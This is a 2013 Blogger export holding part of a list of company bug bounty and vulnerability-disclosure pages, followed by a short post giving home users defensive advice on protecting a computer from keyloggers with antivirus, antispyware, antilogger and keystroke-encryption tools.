<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
AT&T<br />
<a href="http://developer.att.com/developer/apiDetailPage.jsp?passedItemId=10700235" target="_blank">http://developer.att.com/developer/apiDetailPage.jsp?passedItemId=10700235</a>
- (We’ve been told that to submit you need to sign up to the Developer
API Program which costs 99 USD…)<br />
<br />
<br />
<br />
Samsuung<br />
<h3 class="post-title entry-title" itemprop="name">
<b><span style="color: red; font-family: Trebuchet MS, sans-serif; font-size: medium;"> </span></b><a href="https://samsungtvbounty.com/" target="_blank">https://samsungtvbounty.com/</a></h3>
<h3 class="post-title entry-title" itemprop="name">
Piwik</h3>
<h3 class="post-title entry-title" itemprop="name">
<a href="http://piwik.org/security/" target="_blank">http://piwik.org/security/</a> </h3>
<h3 class="post-title entry-title" itemprop="name">
Ebay</h3>
<h3 class="post-title entry-title" itemprop="name">
<a href="http://pages.ebay.com/securitycenter/ResearchersAcknowledgement.html" target="_blank">http://pages.ebay.com/securitycenter/ResearchersAcknowledgement.html</a> </h3>
<h3 class="post-title entry-title" itemprop="name">
Nokia</h3>
<h3 class="post-title entry-title" itemprop="name">
<a href="http://www.nokia.com/global/security/acknowledgements/" target="_blank">http://www.nokia.com/global/security/acknowledgements/</a> </h3>
<h3 class="post-title entry-title" itemprop="name">
IBM</h3>
<h3 class="post-title entry-title" itemprop="name">
<a href="http://www-03.ibm.com/security/secure-engineering/report.html" target="_blank">http://www-03.ibm.com/security/secure-engineering/report.html</a> </h3>
<h3 class="post-title entry-title" itemprop="name">
HTC</h3>
<h3 class="post-title entry-title" itemprop="name">
<a href="http://www.htc.com/us/terms/product-security/" target="_blank">http://www.htc.com/us/terms/product-security/</a> </h3>
<h3 class="post-title entry-title" itemprop="name">
Zyanga</h3>
<h3 class="post-title entry-title" itemprop="name">
<a href="http://company.zynga.com/security/whitehats" target="_blank">http://company.zynga.com/security/whitehats</a> </h3>
<h3 class="post-title entry-title" itemprop="name">
<b><span style="font-family: Trebuchet MS, sans-serif;"> </span></b></h3>
<h3 class="post-title entry-title" itemprop="name">
<b><span style="font-family: Trebuchet MS, sans-serif;"> </span></b></h3>
<h3 class="post-title entry-title" itemprop="name">
<b><span style="font-family: Trebuchet MS, sans-serif;"> </span></b></h3>
<h3 class="post-title entry-title" itemprop="name">
<b><span style="font-family: Trebuchet MS, sans-serif;">WE Will Update New List ASAP :)</span></b> </h3>
</div>
<!-- Blogger automated replacement: "http://images-onepick-opensocial.googleusercontent.com/gadgets/proxy?container=onepick&gadget=a&rewriteMime=image%2F*&url=http%3A%2F%2Fwww.pinoyhacknews.com%2Fwp-content%2Fuploads%2F2013%2F01%2Favast-bug-bounty-660x330.jpg" with "https://blogger.googleusercontent.com/img/proxy/AVvXsEib5VW2chU8XLZzFOfsGAFtdI8pZu6nDdbrMbXUr0FOl_x2oJRpXdb3nr6CIajgtpFdu-H2i2w54egtNemCnj_qcABRI4lMCC4tgcR7cYeEqnWxeW1Q5-OKJm3nO9LtNhobZVxCWibAFcFFxFID9RN2UuLepWlhbO2oXSf2cWcUJ_EQKaarMoeVFfscWr5_rEmLmuti=" -->karteek munjalhttp://www.blogger.com/profile/11038471085469666615noreply@blogger.comtag:blogger.com,1999:blog-7579126592452208824.post-43656400051334670972013-04-10T07:44:00.002-07:002013-05-12T07:14:49.684-07:00How to secure your system from Keyloggers<div dir="ltr" style="text-align: left;" trbidi="on">
<h3 class="post-title entry-title">
How to secure your system from Keyloggers
<br /><br />Now a days keylogger is major problem for all. So we should learn to
secure our computer from keylogger. This article will help for
ethical hackers or who want to protect their pc.</h3>
<h3 class="post-title entry-title">
<b>What is Keylogger?</b></h3>
<h3 class="post-title entry-title">
Keylogger is one of spyware which will what type you through the
keyboard and send it to hacker who send the keylogger. Hackers mainly
use keyloggers to steal your passwords, <span class="IL_AD" id="IL_AD6">credit card numbers</span> and other confidential data. So whenever you type the username and password in gmail,online <span class="IL_AD" id="IL_AD9">banking</span> sites, it will send the username and password to hacker. </h3>
<h3 class="post-title entry-title">
<br /> <span style="font-size: medium;"><b>How to Protect?</b></span></h3>
<h3 class="post-title entry-title">
<span style="font-size: medium;"><b></b></span><span style="font-size: medium;"><b>In order to provide security for your system,you must have<br />
<br />
<br />
<b>Good AntiVirus:</b><br />
This is basic and best step to <span class="IL_AD" id="IL_AD10">protect your system</span> from keylogger. So buy a licensed and best antivirus which is currently in <span class="IL_AD" id="IL_AD4">market</span>. My suggestion is Kaspersky, Norton or Mcafee & My Favorite Avast It Is An Best Option To protct Your Computer Info . Don't forget to update regularly.<br />
<i>Note:</i> Don't use trial or cracked pack Of Kaspersky, Norton or Mcafee,it is worthless to use.But U Can Use Avast Trial U can DownLoad It from <a href="http://adf.ly/MhOFR" target="_blank">http://adf.ly/MhOFR</a> Here .</b></span></h3>
<h3 class="post-title entry-title">
<br /><b> Good Spyware</b>:</h3>
<h3 class="post-title entry-title">
Since keyloggers are basically spywares, if you are a frequent user of
Internet then you could be exposed to thousands of keyloggers and
spywares. So you should use a good antispyware such as NoAdware.</h3>
<h3 class="post-title entry-title">
<b>Antilogger can be Handy</b></h3>
<h3 class="post-title entry-title">
<b>Antiloggers are programs that detect the presence of keyloggers on a given computer. Zemana Antilogger is the best antilogger.</b></h3>
<h3 class="post-title entry-title">
<b></b><b><b>Online Scanning</b> </b> </h3>
<h3 class="post-title entry-title">
When ever you receive a suspicious file, you scan it with online
scanners such as Multi engine antivirus scanner which scans your file
with 24 antivirus engines and reports it back to you if <span class="IL_AD" id="IL_AD8">the file</span>
is recognized as a virus or spyware. This ensures that none of the
malicious programs can escape from being detected as there are 24
different antivirus engines are involved in the scanning process.</h3>
<h3 class="post-title entry-title">
<b>Keyscrambler</b> </h3>
<h3 class="post-title entry-title">
Keyscrambler is one of the best protection against keyloggers that you
can have, Keyscrambler is a small program which encrypts your typed
keystrokes so even if the victim has installed a keylogger on your
system, he or she will get encrypted keys. Keyscrambler currently
supports Firefox, Internet explorer and other applications, however its
premium version supports more than 160 applications
</h3>
</div>
karteek munjalhttp://www.blogger.com/profile/11038471085469666615noreply@blogger.com